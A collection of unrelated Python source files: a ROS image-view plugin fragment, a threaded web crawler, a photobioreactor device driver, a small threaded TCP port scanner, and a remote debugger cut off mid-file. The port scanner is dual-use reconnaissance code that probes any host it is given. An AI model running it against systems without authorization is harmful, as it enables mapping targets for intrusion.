@pyqtSlot()
def redraw(self):
with self.lock:
if not self.need_to_rewrite:
return
if self.cv_image != None:
size = self.cv_image.shape
img = QImage(self.cv_image.data,
size[1], size[0], size[2] * size[1],
QImage.Format_RGB888)
# convert to QPixmap
self.pixmap = QPixmap(size[1], size[0])
self.pixmap.convertFromImage(img)
self.label.setPixmap(self.pixmap.scaled(
self.label.width(), self.label.height(),
QtCore.Qt.KeepAspectRatio))
#self.label.setPixmap(self.pixmap)
def mousePosition(self, e):
label_x = self.label.x()
label_y = self.label.y()
label_width = self.label.width()
label_height = self.label.height()
pixmap_width = self.label.pixmap().width()
pixmap_height = self.label.pixmap().height()
x_offset = (label_width - pixmap_width) / 2.0 + label_x
y_offset = (label_height - pixmap_height) / 2.0 + label_y
return (e.x() - x_offset, e.y()- y_offset)
def mouseMoveEvent(self, e):
msg = MouseEvent()
msg.header.stamp = rospy.Time.now()
msg.type = MouseEvent.MOUSE_MOVE
msg.x, msg.y = self.mousePosition(e)
msg.width = self.label.pixmap().width()
msg.height = self.label.pixmap().height()
if self.event_pub:
self.event_pub.publish(msg)
def mousePressEvent(self, e):
msg = MouseEvent()
msg.header.stamp = rospy.Time.now()
if e.button() == Qt.LeftButton:
msg.type = MouseEvent.MOUSE_LEFT_DOWN
self.left_button_clicked = True
elif e.button() == Qt.RightButton:
msg.type = MouseEvent.MOUSE_RIGHT_DOWN
msg.width = self.label.pixmap().width()
msg.height = self.label.pixmap().height()
msg.x, msg.y = self.mousePosition(e)
if self.event_pub:
self.event_pub.publish(msg)
def mouseReleaseEvent(self, e):
if e.button() == Qt.LeftButton:
self.left_button_clicked = False
msg = MouseEvent()
msg.header.stamp = rospy.Time.now()
msg.width = self.label.pixmap().width()
msg.height = self.label.pixmap().height()
msg.type = MouseEvent.MOUSE_LEFT_UP
msg.x, msg.y = self.mousePosition(e)
if self.event_pub:
self.event_pub.publish(msg)
def save_settings(self, plugin_settings, instance_settings):
if self._active_topic:
instance_settings.set_value("active_topic", self._active_topic)
def restore_settings(self, plugin_settings, instance_settings):
if instance_settings.value("active_topic"):
topic = instance_settings.value("active_topic")
self._dialog.combo_box.addItem(topic)
self.setupSubscriber(topic)
|
e03parallel.py
|
#!/usr/bin/env python3
"""
./e03parallel.py http://camlistore.org 2
Found 37 urls
...
"""
from queue import Queue
from sys import argv
from threading import Thread
from e01extract import canonicalize, extract
from e02crawl import print_crawl
def crawl_parallel(start_url, max_depth):
fetch_queue = Queue() # (crawl_depth, url)
fetch_queue.put((0, canonicalize(start_url)))
seen_urls, result = set(), []
func = lambda: consumer(fetch_queue, max_depth, seen_urls, result)
for _ in range(3):
Thread(target=func, daemon=True).start()
fetch_queue.join()
return result
def consumer(fetch_queue, max_depth, seen_urls, result):
while True:
depth, url = fetch_queue.get()
try:
if depth > max_depth: continue
if url in seen_urls: continue # GIL :|
seen_urls.add(url) # GIL :/
try:
_, data, found_urls = extract(url)
except Exception:
continue
result.append((depth, url, data)) # GIL :(
for found in found_urls:
fetch_queue.put((depth + 1, found))
finally:
fetch_queue.task_done()
def main():
result = crawl_parallel(argv[1], int(argv[2]))
print_crawl(result)
if __name__ == '__main__':
main()
|
PBR.py
|
from threading import Thread, Event
from time import sleep
from core.device.abstract import Connector
from core.log import Logger
from custom.devices.Phenometrics.libs.communication import Connection
class PBR(Connector):
class PumpManager:
def __init__(self, device_id, connection: Connection):
self.connection = connection
self.device_id = device_id
self._pump = Event()
self.discarded = Event()
t = Thread(target=self._run)
t.start()
self.success = None
def _run(self):
while not self.discarded.is_set():
self._pump.wait()
while self._pump.is_set():
try:
self.success, result = self.connection.send_command(self.device_id, 'setAux2', [1])
sleep(20)
self.success, result = self.connection.send_command(self.device_id, 'setAux2', [0])
except Exception as exc:
Logger.error(exc)
self.success = None
def start_pump(self):
self._pump.set()
# while we do not know whether the commands are going through or not
while self.success is None:
continue
# if the commands are not going through, stop the process
if not self.success:
self.stop_pump()
return self.success
def stop_pump(self):
self._pump.clear()
return True
def discard(self):
self.discarded.set()
def __init__(self, config: dict):
self.host_address = None
self.host_port = None
self.encryption_key = None
super(PBR, self).__init__(config)
self.connection = Connection(self.host_address,
self.host_port,
self.encryption_key)
self.interpreter = {
"1": self.get_temp_settings,
"2": self.get_temp,
"3": self.set_temp,
"4": self.get_ph,
"5": self.measure_od,
"6": self.get_pump_params,
"7": self.set_pump_params,
"8": self.set_pump_state,
"9": self.get_light_intensity,
"10": self.set_light_intensity,
"11": self.turn_on_light,
"12": self.get_pwm_settings,
"13": self.set_pwm,
"14": self.get_o2,
"15": self.set_thermoregulator_state,
"16": self.measure_ft,
"17": self.get_co2,
"18": self.measure_all,
"19": self.measure_AUX,
"20": self.flash_LED,
"21": self.get_hardware_address,
"22": self.get_cluster_name
}
self.disableGUI()
self.pump_manager = PBR.PumpManager(self.device_id, self.connection)
def get_temp_settings(self):
"""
Get information about currently set temperature, maximal and
minimal allowed temperature.
:return: The current settings structured in a dictionary.
"""
raise NotImplementedError("The method not implemented")
def get_temp(self):
"""
Get current temperature in Celsius degree.
:return: The current temperature.
"""
success, result = self.connection.send_command(self.device_id, 'measureTemperature', [])
if not success:
raise Exception(result)
return {'temp': float(result)}
def set_temp(self, temp):
"""
Set desired temperature in Celsius degree.
:param temp: The temperature.
:return: True if was successful, False otherwise.
"""
success, result = self.connection.send_command(self.device_id, 'setTemperature', [temp])
if not success:
raise Exception(result)
return {'success': float(result) == temp}
def get_ph(self):
"""
Get current pH (dimensionless.)
:param repeats: the number of measurement repeats
:param wait: waiting time between indivdevice_idual repeats
:return: The current pH.
"""
success, result = self.connection.send_command(self.device_id, 'measurePH', [])
if not success:
raise Exception(result)
return {'pH': float(result)}
def measure_od(self, channel=0):
"""
Measure current Optical Density (OD, dimensionless).
:param channel: which channel should be measured
:return: Measured OD
"""
variant = ["measureOD1", "measureOD2"]
success, result = self.connection.send_command(self.device_id, variant[channel], [])
if not success:
raise Exception(result)
return {'od': float(result), "channel": channel}
def get_pump_params(self, pump):
"""
Get parameters for given pump.
:param pump: Given pump
:return: The current settings structured in a dictionary.
"""
raise NotImplementedError("The method not implemented")
def set_pump_params(self, pump, direction, flow):
"""
Set up the rotation direction and flow for given pump.
:param pump: Given pump
:param direction: Rotation direction (1 right, -1 left)
:param flow: Desired flow rate
:return: True if was successful, False otherwise.
"""
raise NotImplementedError("The method not implemented")
def set_pump_state(self, on):
"""
Turns on/off given pump.
:param pump: device_id of a pump
:param on: True to turn on, False to turn off
:return: True if was successful, False otherwise.
"""
result = self.pump_manager.start_pump() if on else self.pump_manager.stop_pump()
return {'success': result}
def get_light_intensity(self, channel):
"""
Checks for current (max?) light intensity.
Items: "intensity": current light intensity (float) in μE,
"max": maximal intensity (float) in μE,
"on": True if light is turned on (bool)
:param channel: Given channel device_id
:return: The current settings structured in a dictionary.
"""
raise NotImplementedError("The method not implemented")
def set_light_intensity(self, channel, intensity):
"""
Control LED panel on photobioreactor.
:param channel: Given channel (0 for red light, 1 for blue light)
:param intensity: Desired intensity
:return: True if was successful, False otherwise.
"""
success, result = self.connection.send_command(self.device_id, 'setSolarLED', [intensity])
if not success:
raise Exception(result)
return {'success': float(result) == float(intensity)}
def turn_on_light(self, channel, on):
"""
Turn on/off LED panel on photobioreactor.
:param channel: Given channel
:param on: True turns on, False turns off
:return: True if was successful, False otherwise.
"""
raise NotImplementedError("The method not implemented")
def get_pwm_settings(self):
"""
Checks for current stirring settings.
Items: "pulse": current stirring in %,
"min": minimal stirring in %,
"max": maximal stirring in %,
"on": True if stirring is turned on (bool)
:return: The current settings structured in a dictionary.
"""
raise NotImplementedError("The method not implemented")
def set_pwm(self, value, on):
"""
Set stirring settings.
Channel: 0 red and 1 blue according to PBR configuration.
:param value: desired stirring pulse
:param on: True turns on, False turns off
:return: True if was successful, False otherwise.
"""
success, result = self.connection.send_command(self.device_id, 'setStir', [value])
if not success:
raise Exception(result)
return {'success': float(result) == float(value)}
def get_o2(self, raw=True, repeats=5, wait=0):
"""
Checks for concentration of dissociated O2.
Items: "pulse": current stirring in %,
"min": minimal stirring in %,
"max": maximal stirring in %,
"on": True if stirring is turned on (bool)
:param raw: True for raw data, False for data calculated according to temperature calibration
:param repeats: the number of measurement repeats
:param wait: waiting time between indivdevice_idual repeats
:return: The current settings structured in a dictionary.
"""
raise NotImplementedError("The method not implemented")
def set_thermoregulator_state(self, on):
"""
Set state of thermoregulator.
:param on: 1 -> on, 0 -> freeze, -1 -> off
:return: True if was successful, False otherwise.
"""
success, result = self.connection.send_command(self.device_id, 'stopTemperatureControl', [])
if not success:
raise Exception(result)
return {'success': result == "stopTemperatureControl"}
def measure_ft(self, channel):
"""
???
:param channel: ???
:return: ???
"""
raise NotImplementedError("The method not implemented")
def get_co2(self, raw, repeats):
"""
TBA
:param raw: True for raw data, False for data ???
:param repeats: the number of measurement repeats
:return:
"""
raise NotImplementedError("The method not implemented")
def measure_all(self, ft_channel=5, pump_id=5):
"""
Measures all basic measurable values.
:param ft_channel: channel for ft_measure
:param pump_id: id of particular pump
:return: dictionary of all measured values
"""
measure_all_dictionary = dict()
measure_all_dictionary["pwm_settings"] = False, "pwm settings not available for this device"
measure_all_dictionary["light_0"] = False, "light_0 not available for this device"
measure_all_dictionary["light_1"] = False, "light_1 not available for this device"
try:
measure_all_dictionary["od_0"] = True, self.measure_od(0)
except Exception:
measure_all_dictionary["od_0"] = False, "Cannot get od_0"
try:
measure_all_dictionary["od_1"] = True, self.measure_od(1)
except Exception:
measure_all_dictionary["od_1"] = False, "Cannot get od_1"
try:
measure_all_dictionary["ph"] = True, self.get_ph(),
except Exception:
measure_all_dictionary["ph"] = False, "Cannot get ph"
try:
measure_all_dictionary["temp"] = True, self.get_temp(),
except Exception:
measure_all_dictionary["temp"] = False, "Cannot get temp"
measure_all_dictionary["pump"] = False, "pump settings not available for this device"
measure_all_dictionary["o2"] = False, "o2 settings not available for this device"
measure_all_dictionary["co2"] = False, "co2 settings not available for this device"
measure_all_dictionary["ft"] = False, "ft settings not available for this device"
return measure_all_dictionary
def measure_AUX(self, channel):
"""
Values of AUX auxiliary input voltage.
:param channel: ???
:return: ???
"""
variant = ["measureAux1", "measureAux2"]
success, result = self.connection.send_command(self.device_id, variant[channel], [])
if not success:
raise Exception(result)
return {'aux': float(result), "channel": channel}
def flash_LED(self):
"""
Triggers a flashing sequence and is used to physically identify the PBR.
!!! random blank spaces complicate things. Is it like that also with "real" PBR?
:return: True if was successful, False otherwise
"""
success, result = self.connection.send_command(self.device_id, "flashLED", [])
if not success:
raise Exception(result)
return {'success': result.lstrip() == "flashLED"}
def get_hardware_address(self):
"""
Get the MAC address of the PBR.
:return: the MAC address
"""
success, result = self.connection.send_command(self.device_id, "getHardwareAddress", [])
if not success:
raise Exception(result)
return {'HWaddress': result.lstrip()}
def get_cluster_name(self):
"""
The name of the bioreactor array / cluster.
:return: the cluster name
"""
success, result = self.connection.send_command(self.device_id, "getMatrixName", [])
if not success:
raise Exception(result)
return {'clusterName': result.lstrip()}
def test_connection(self) -> bool:
try:
self.get_cluster_name()
return True
except Exception:
return False
def disableGUI(self):
success, result = self.connection.send_command(self.device_id, "disableGUI", [])
if not success:
raise Exception(result)
return {'success': result.lstrip() == "disableGUI"}
def enableGUI(self):
success, result = self.connection.send_command(self.device_id, "enableGUI", [])
if not success:
raise Exception(result)
# TODO: change "disableGUI" string to "enableGUI" after the bug on Phenometrics software is fixed
return {'success': result.lstrip() == "disableGUI"}
def disconnect(self):
self.enableGUI()
self.pump_manager.discard()
|
py_portscanner.py
|
#!/usr/bin/env python
import socket, sys
from threading import Thread
# Easily changeable variables (you can extend the timeout length if necessary)
threads = []
timeout = 0.5
# Inputs & simple error handling
try:
host = raw_input("Enter Target Host Address: ")
hostIP = socket.gethostbyname(host)
startPort = int(raw_input("Enter Starting Port to Scan: "))
endPort = int(raw_input("Enter Ending Port to Scan: "))
except KeyboardInterrupt:
print "\n\n[*]User Requested an Interrupt[*]"
sys.exit()
except socket.gaierror:
print "\n\n[*]Hostname unresolvable[*]"
sys.exit()
except socket.error:
print "\n\n[*]Unable to connect to target[*]"
sys.exit()
# Scanning Banner
print "-" * 50
print "Scanning Target: ", hostIP
print "-" * 50
# Scanning and open port display
def scanner(port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.setdefaulttimeout(timeout)
result = sock.connect_ex((hostIP, port))
if result == 0:
print "[*] Port {}: Open".format(port)
sock.close()
# Setup threading and calling the scan
for i in range(startPort, endPort+1):
thread = Thread(target=scanner, args=(i,))
threads.append(thread)
thread.start()
[x.join() for x in threads]
# Completion Banner
print "-" * 50
print "Scanning completed!"
print "-" * 50
|
qdb.py
|
#!/usr/bin/env python
# coding:utf-8
"Queues(Pipe)-based independent remote client-server Python Debugger"
__author__ = "Mariano Reingart (reingart@gmail.com)"
__copyright__ = "Copyright (C) 2011 Mariano Reingart"
__license__ = "LGPL 3.0"
__version__ = "1.01b"
# remote debugger queue-based (jsonrpc-like interface):
# - bidirectional communication (request - response calls in both ways)
# - request with id == null is a notification (do not send a response)
# - request with a value for id is a normal call, wait response
# based on idle, inspired by pythonwin implementation, taken many code from pdb
import bdb
import inspect
import linecache
import os
import sys
import traceback
import cmd
import pydoc
import threading
class Qdb(bdb.Bdb):
"Qdb Debugger Backend"
def __init__(self, pipe, redirect_stdio=True, allow_interruptions=False,
skip=[__name__]):
kwargs = {}
if sys.version_info > (2, 7):
kwargs['skip'] = skip
bdb.Bdb.__init__(self, **kwargs)
self.frame = None
self.i = 1 # sequential RPC call id
self.waiting = False
self.pipe = pipe # for communication
self._wait_for_mainpyfile = False
self._wait_for_breakpoint = False
self.mainpyfile = ""
self._lineno = None # last listed line numbre
# replace system standard input and output (send them thru the pipe)
if redirect_stdio:
sys.stdin = self
sys.stdout = self
sys.stderr = self
if allow_interruptions:
# fake breakpoint to prevent removing trace_dispatch on set_continue
self.breaks[None] = []
self.allow_interruptions = allow_interruptions
self.burst = 0 # do not send notifications ("burst" mode)
self.params = {} # optional parameters for interaction
def pull_actions(self):
# receive a remote procedure call from the frontend:
# returns True if action processed
# None when 'run' notification is received (see 'startup')
request = self.pipe.recv()
if request.get("method") == 'run':
return None
response = {'version': '1.1', 'id': request.get('id'),
'result': None,
'error': None}
try:
# dispatch message (JSON RPC like)
method = getattr(self, request['method'])
response['result'] = method.__call__(*request['args'],
**request.get('kwargs', {}))
except Exception, e:
response['error'] = {'code': 0, 'message': str(e)}
# send the result for normal method calls, not for notifications
if request.get('id'):
self.pipe.send(response)
return True
# Override Bdb methods
def trace_dispatch(self, frame, event, arg):
# check for non-interaction rpc (set_breakpoint, interrupt)
while self.allow_interruptions and self.pipe.poll():
self.pull_actions()
# process the frame (see Bdb.trace_dispatch)
if self.quitting:
return # None
if event == 'line':
return self.dispatch_line(frame)
if event == 'call':
return self.dispatch_call(frame, arg)
if event == 'return':
return self.dispatch_return(frame, arg)
if event == 'exception':
return self.dispatch_exception(frame, arg)
return self.trace_dispatch
def user_call(self, frame, argument_list):
"""This method is called when there is the remote possibility
that we ever need to stop in this function."""
if self._wait_for_mainpyfile or self._wait_for_breakpoint:
return
if self.stop_here(frame):
self.interaction(frame, None)
def user_line(self, frame):
"""This function is called when we stop or break at this line."""
if self._wait_for_mainpyfile:
if (not self.canonic(frame.f_code.co_filename).startswith(self.mainpyfile)
or frame.f_lineno<= 0):
return
self._wait_for_mainpyfile = 0
if self._wait_for_breakpoint:
if not self.break_here(frame):
return
self._wait_for_breakpoint = 0
self.interaction(frame)
def user_exception(self, frame, info):
"""This function is called if an exception occurs,
but only if we are to stop at or just below this level."""
if self._wait_for_mainpyfile or self._wait_for_breakpoint:
return
extype, exvalue, trace = info
# pre-process stack trace as it isn't pickeable (cannot be sent pure)
msg = ''.join(traceback.format_exception(extype, exvalue, trace))
trace = traceback.extract_tb(trace)
title = traceback.format_exception_only(extype, exvalue)[0]
# send an Exception notification
msg = {'method': 'exception',
'args': (title, extype.__name__, exvalue, trace, msg),
'id': None}
self.pipe.send(msg)
self.interaction(frame, info)
def run(self, code, interp=None, *args, **kwargs):
try:
return bdb.Bdb.run(self, code, *args, **kwargs)
finally:
pass
def runcall(self, function, interp=None, *args, **kwargs):
try:
self.interp = interp
return bdb.Bdb.runcall(self, function, *args, **kwargs)
finally:
pass
def _runscript(self, filename):
# The script has to run in __main__ namespace (clear it)
import __main__
import imp
__main__.__dict__.clear()
__main__.__dict__.update({"__name__" : "__main__",
"__file__" : filename,
"__builtins__": __builtins__,
"imp" : imp, # need for run
})
# avoid stopping before we reach the main script
self._wait_for_mainpyfile = 1
self.mainpyfile = self.canonic(filename)
self._user_requested_quit = 0
statement = 'imp.load_source("__main__", "%s")' % filename
# notify and wait frontend to set initial params and breakpoints
self.pipe.send({'method': 'startup', 'args': (__version__, )})
while self.pull_actions() is not None:
pass
self.run(statement)
# General interaction function
def interaction(self, frame, info=None):
# chache frame locals to ensure that modifications are not overwritten
self.frame_locals = frame and frame.f_locals or {}
# extract current filename and line number
code, lineno = frame.f_code, frame.f_lineno
filename = code.co_filename
basename = os.path.basename(filename)
message = "%s:%s" % (basename, lineno)
if code.co_name != "?":
message = "%s: %s()" % (message, code.co_name)
# wait user events
self.waiting = True
self.frame = frame
try:
while self.waiting:
# sync_source_line()
if frame and filename[:1] + filename[-1:] != "<>" and os.path.exists(filename):
line = linecache.getline(filename, self.frame.f_lineno,
self.frame.f_globals)
else:
line = ""
# send the notification (debug event) - DOESN'T WAIT RESPONSE
self.burst -= 1
if self.burst < 0:
kwargs = {}
if self.params.get('call_stack'):
kwargs['call_stack'] = self.do_where()
if self.params.get('environment'):
kwargs['environment'] = self.do_environment()
self.pipe.send({'method': 'interaction', 'id': None,
'args': (filename, self.frame.f_lineno, line),
'kwargs': kwargs})
self.pull_actions()
finally:
self.waiting = False
self.frame = None
def do_debug(self, mainpyfile=None, wait_breakpoint=1):
self.reset()
if not wait_breakpoint or mainpyfile:
self._wait_for_mainpyfile = 1
if not mainpyfile:
frame = sys._getframe().f_back
mainpyfile = frame.f_code.co_filename
self.mainpyfile = self.canonic(mainpyfile)
self._wait_for_breakpoint = wait_breakpoint
sys.settrace(self.trace_dispatch)
def set_trace(self, frame=None):
# start debugger interaction immediatelly
if frame is None:
frame = sys._getframe().f_back
self._wait_for_mainpyfile = frame.f_code.co_filename
self._wait_for_breakpoint = 0
bdb.Bdb.set_trace(self, frame)
# Command definitions, called by interaction()
def do_continue(self):
self.set_continue()
self.waiting = False
def do_step(self):
self.set_step()
self.waiting = False
def do_return(self):
self.set_return(self.frame)
self.waiting = False
def do_next(self):
self.set_next(self.frame)
self.waiting = False
def interrupt(self):
self.set_step()
def do_quit(self):
self.set_quit()
self.waiting = False
def do_jump(self, lineno):
arg = int(lineno)
try:
self.frame.f_lineno = arg
return arg
except ValueError, e:
print '*** Jump failed:', e
return False
def do_list(self, arg):
last = None
if arg:
if isinstance(arg, tuple):
first, last = arg
else:
first = arg
elif not self._lineno:
first = max(1, self.frame.f_lineno - 5)
else:
first = self._lineno + 1
if last is None:
last = first + 10
filename = self.frame.f_code.co_filename
breaklist = self.get_file_breaks(filename)
lines = []
for lineno in range(first, last+1):
line = linecache.getline(filename, lineno,
self.frame.f_globals)
if not line:
lines.append((filename, lineno, '', current, "<EOF>\n"))
break
else:
breakpoint = "B" if lineno in breaklist else ""
current = "->" if self.frame.f_lineno == lineno else ""
lines.append((filename, lineno, breakpoint, current, line))
self._lineno = lineno
return lines
def do_read(self, filename):
return open(filename, "Ur").read()
def do_set_breakpoint(self, filename, lineno, temporary=0, cond=None):
return self.set_break(filename, int(lineno), temporary, cond)
def do_list_breakpoint(self):
breaks = []
if self.breaks: # There's at least one
for bp in bdb.Breakpoint.bpbynumber:
if bp:
breaks.append((bp.number, bp.file, bp.line,
bp.temporary, bp.enabled, bp.hits, bp.cond, ))
return breaks
def do_clear_breakpoint(self, filename, lineno):
self.clear_break(filename, lineno)
def do_clear_file_breakpoints(self, filename):
self.clear_all_file_breaks(filename)
def do_clear(self, arg):
# required by BDB to remove temp breakpoints!
err = self.clear_bpbynumber(arg)
if err:
print '*** DO_CLEAR failed', err
def do_eval(self, arg, safe=True):
ret = eval(arg, self.frame.f_globals,
self.frame_locals)
if safe:
ret = pydoc.cram(repr(ret), 255)
return ret
def do_exec(self, arg):
locals = self.frame_locals
globals = self.frame.f_globals
code = compile(arg + '\n', '<stdin>', 'single')
save_displayhook = sys.displayhook
self.displayhook_value = None
try:
sys.displayhook = self.displayhook
exec code in globals, locals
finally:
sys.displayhook = save_displayhook
return self.displayhook_value
def do_where(self):
"print_stack_trace"
stack, curindex = self.get_stack(self.frame, None)
lines = []
for frame, lineno in stack:
filename = frame.f_code.co_filename
line = linecache.getline(filename, lineno)
lines.append((filename, lineno, "", "", line, ))
return lines
def do_environment(self):
"return current frame local and global environment"
env = {'locals': {}, 'globals': {}}
# converts the frame global and locals to a short text representation:
if self.frame:
for name, value in self.frame_locals.items():
env['locals'][name] = pydoc.cram(repr(value), 255), repr(type(value))
for name, value in self.frame.f_globals.items():
env['globals'][name] = pydoc.cram(repr(value), 20), repr(type(value))
return env
def get_autocomplete_list(self, expression):
"Return list of auto-completion options for expression"
try:
obj = self.do_eval(expression)
except:
return []
else:
return dir(obj)
def get_call_tip(self, expression):
"Return list of auto-completion options for expression"
try:
obj = self.do_eval(expression)
except Exception, e:
return ('', '', str(e))
else:
name = ''
try:
name = obj.__name__
except AttributeError:
pass
argspec = ''
drop_self = 0
f = None
try:
if inspect.isbuiltin(obj):
pass
elif inspect.ismethod(obj):
# Get the function from the object
f = obj.im_func
drop_self = 1
elif inspect.isclass(obj):
# Get the __init__ method function for the class.
if hasattr(obj, '__init__'):
f = obj.__init__.im_func
else:
for base in object.__bases__:
if hasattr(base, '__init__'):
f = base.__init__.im_func
break
if f is not None:
drop_self = 1
elif callable(obj):
# use the obj as a function by default
f = obj
# Get the __call__ method instead.
f = obj.__call__.im_func
drop_self = 0
except AttributeError:
pass
if f:
argspec = apply(inspect.formatargspec, inspect.getargspec(f))
doc = ''
if callable(obj):
try:
doc = inspect.getdoc(obj)
except:
pass
return (name, argspec[1:-1], doc.strip())
def set_burst(self, val):
"Set burst mode -multiple command count- (shut up notifications)"
self.burst = val
def set_params(self, params):
"Set parameters for interaction"
self.params.update(params)
def displayhook(self, obj):
"""Custom displayhook for the do_exec which prevents
assignment of the _ variable in the builtins.
"""
self.displayhook_value = repr(obj)
def reset(self):
bdb.Bdb.reset(self)
self.waiting = False
self.frame = None
def post_mortem(self, t=None):
# handling the default
if t is None:
# sys.exc_info() returns (type, value, traceback) if an exception is
# being handled, otherwise it returns None
t = sys.exc_info()[2]
if t is None:
raise ValueError("A valid traceback must be passed if no "
"exception is being handled")
self.reset()
# get last frame:
while t is not None:
frame = t.tb_frame
t = t.tb_next
code, lineno = frame.f_code, frame.f_lineno
filename = code.co_filename
line = linecache.getline(filename, lineno)
#(filename, lineno, "", current, line, )}
self.interaction(frame)
# console file-like object emulation
def readline(self):
"Replacement for stdin.readline()"
msg = {'method': 'readline', 'args': (), 'id': self.i}
self.pipe.send(msg)
msg = self.pipe.recv()
self.i += 1
return msg['result']
def readlines(self):
"Replacement for stdin.readlines()"
lines = []
while lines[-1:] != ['\n']:
lines.append(self.readline())
return lines
def write(self, text):
"Replacement for stdout.write()"
msg = {'method': 'write', 'args': (text, ), 'id': None}
self.pipe.send(msg)
def writelines(self, l):
map(self.write, l)
def flush(self):
pass
def isatty(self):
return 0
class QueuePipe(object):
"Simulated pipe for threads (using two queues)"
def __init__(self, name, in_queue, out_queue):
self.__name = name
self.in_queue = in_queue
self.out_queue = out_queue
def send(self, data):
self.out_queue.put(data, block=True)
def recv(self, count=None, timeout=None):
data = self.in_queue.get(block=True, timeout=timeout)
return data
def poll(self, timeout=None):
return not self.in_queue.empty()
def close(self):
pass
class RPCError(RuntimeError):
"Remote Error (not user exception)"
pass
class Frontend(object):
"Qdb generic Frontend interface"
def __init__(self, pipe):
self.i = 1
self.pipe = pipe
self.notifies = []
self.read_lock = threading.RLock()
self.write_lock = threading.RLock()
def recv(self):
self.read_lock.acquire()
try:
return self.pipe.recv()
finally:
self.read_lock.release()
def send(self, data):
self.write_lock.acquire()
try:
return self.pipe.send(data)
finally:
self.write_lock.release()
def startup(self):
self.send({'method': 'run', 'args': (), 'id': None})
def interaction(self, filename, lineno, line, *kwargs):
raise NotImplementedError
def exception(self, title, extype, exvalue, trace, request):
"Show a user_exception"
raise NotImplementedError
def write(self, text):
"Console output (print)"
raise NotImplementedError
def readline(self, text):
"Console input/rawinput"
raise NotImplementedError
def run(self):
"Main method dispatcher (infinite loop)"
if self.pipe:
if not self.notifies:
# wait for a message...
request = self.recv()
else:
# process an asyncronus notification received earlier
request = self.notifies.pop(0)
return self.process_message(request)
def process_message(self, request):
if request:
result = None
if request.get("error"):
# it is not supposed to get an error here
# it should be raised by the method call
raise RPCError(res['error']['message'])
elif request.get('method') == 'interaction':
self.interaction(*request.get("args"), **request.get("kwargs"))
elif request.get('method') == 'startup':
self.startup()
elif request.get('method') == 'exception':
self.exception(*request['args'])
elif request.get('method') == 'write':
self.write(*request.get("args"))
elif request.get('method') == 'readline':
result = self.readline()
if result:
response = {'version': '1.1', 'id': request.get('id'),
'result': result,
'error': None}
self.send(response)
return True
def call(self, method, *args):
"Actually call the remote method (inside the thread)"
req = {'method': method, 'args': args, 'id': self.i}
self.send(req)
self.i += 1 # increment the id
while 1:
# wait until command acknowledge (response id match the request)
res = self.recv()
if 'id' not in res or not res['id']:
# nested notification received (i.e. write)! process it!
self.process_message(res)
elif 'result' not in res:
# nested request received (i.e. readline)! process it!
self.process_message(res)
elif long(req['id']) != long(res['id']):
print "DEBUGGER wrong packet received: expecting id", req['id'], res['id']
# protocol state is unknown
elif 'error' in res and res['error']:
raise RPCError(res['error']['message'])
else:
return res['result']
def do_step(self, arg=None):
"Execute the current line, stop at the first possible occasion"
self.call('do_step')
def do_next(self, arg=None):
"Execute the current line, do not stop at function calls"
self.call('do_next')
def do_continue(self, arg=None):
"Continue execution, only stop when a breakpoint is encountered."
self.call('do_continue')
def do_return(self, arg=None):
"Continue execution until the current function returns"
self.call('do_return')
def do_jump(self, arg):
"Set the next line that will be executed."
res = self.call('do_jump', arg)
print res
def do_where(self, arg=None):
"Print a stack trace, with the most recent frame at the bottom."
return self.call('do_where')
def do_quit(self, arg=None):
"Quit from the debugger. The program being executed is aborted."
self.call('do_quit')
def do_eval(self, expr):
"Inspect the value of the expression"
return self.call('do_eval', expr)
def do_environment(self):
"List all the locals and globals variables (string representation)"
return self.call('do_environment')
def do_list(self, arg=None):
"List source code for the current file"
return self.call('do_list', arg)
def do_read(self, filename):
"Read and send a local filename"
return self.call('do_read', filename)
def do_set_breakpoint(self, filename, lineno, temporary=0, cond=None):
"Set a breakpoint at filename:breakpoint"
self.call('do_set_breakpoint', filename, lineno, temporary, cond)
def do_clear_breakpoint(self, filename, lineno):
"Remove a breakpoint at filename:breakpoint"
self.call('do_clear_breakpoint', filename, lineno)
def do_clear_file_breakpoints(self, filename):
"Remove all breakpoints at filename"
self.call('do_clear_breakpoints', filename, lineno)
def do_list_breakpoint(self):
"List all breakpoints"
return self.call('do_list_breakpoint')
def do_exec(self, statement):
return self.call('do_exec', statement)
def get_autocomplete_list(self, expression):
return self.call('get_autocomplete_list', expression)
def get_call_tip(self, expression):
return self.call('get_call_tip', expression)
def interrupt(self):
"Immediately stop at the first possible occasion (outside interaction)"
# this is a notification!, do not expect a response
req = {'method': 'interrupt', 'args': ()}
self.send(req)
def set_burst(self, value):
req = {'method': 'set_burst', 'args': (value, )}
self.send(req)
def set_params(self, params):
req = {'method': 'set_params', 'args': (params, )}
self.send(req)
class Cli(Frontend, cmd.Cmd):
"Qdb Front-end command line interface"
def __init__(self, pipe, completekey='tab', stdin=None, stdout=None, skip=None):
cmd.Cmd.__init__(self, completekey, stdin, stdout)
Frontend.__init__(self, pipe)
# redefine Frontend methods:
def run(self):
while 1:
try:
Frontend.run(self)
except KeyboardInterrupt:
print "Interupting..."
self.interrupt()
def interaction(self, filename, lineno, line):
print "> %s(%d)\n-> %s" % (filename, lineno, line),
self.filename = filename
self.cmdloop()
def exception(self, title, extype, exvalue, trace, request):
print "=" * 80
print "Exception", title
print request
print "-" * 80
def write(self, text):
print text,
def readline(self):
return raw_input()
def postcmd(self, stop, line):
return not line.startswith("h") # stop
do_h = cmd.Cmd.do_help
do_s = Frontend.do_step
do_n = Frontend.do_next
do_c = Frontend.do_continue
do_r = Frontend.do_return
do_j = Frontend.do_jump
do_q = Frontend.do_quit
def do_eval(self, args):
"Inspect the value of the expression"
print Frontend.do_eval(self, args)
def do_list(self, args):
"List source code for the current file"
lines = Frontend.do_list(self, eval(args, {}, {}) if args else None)
self.print_lines(lines)
def do_where(self, args):
"Print a stack trace, with the most recent frame at the bottom."
lines = Frontend.do_where(self)
self.print_lines(lines)
def do_environment(self, args=None):
env = Frontend.do_environment(self)
for key in env:
print "=" * 78
print key.capitalize()
print "-" * 78
for name, value in env[key].items():
print "%-12s = %s" % (name, value)
def do_list_breakpoint(self, arg=None):
"List all breakpoints"
breaks = Frontend.do_list_breakpoint(self)
print "Num File Line Temp Enab Hits Cond"
for bp in breaks:
print '%-4d%-30s%4d %4s %4s %4d %s' % bp
print
def do_set_breakpoint(self, arg):
"Set a breakpoint at filename:breakpoint"
if arg:
if ':' in arg:
args = arg.split(":")
else:
args = (self.filename, arg)
Frontend.do_set_breakpoint(self, *args)
else:
self.do_list_breakpoint()
do_b = do_set_breakpoint
do_l = do_list
do_p = do_eval
do_w = do_where
do_e = do_environment
def default(self, line):
"Default command"
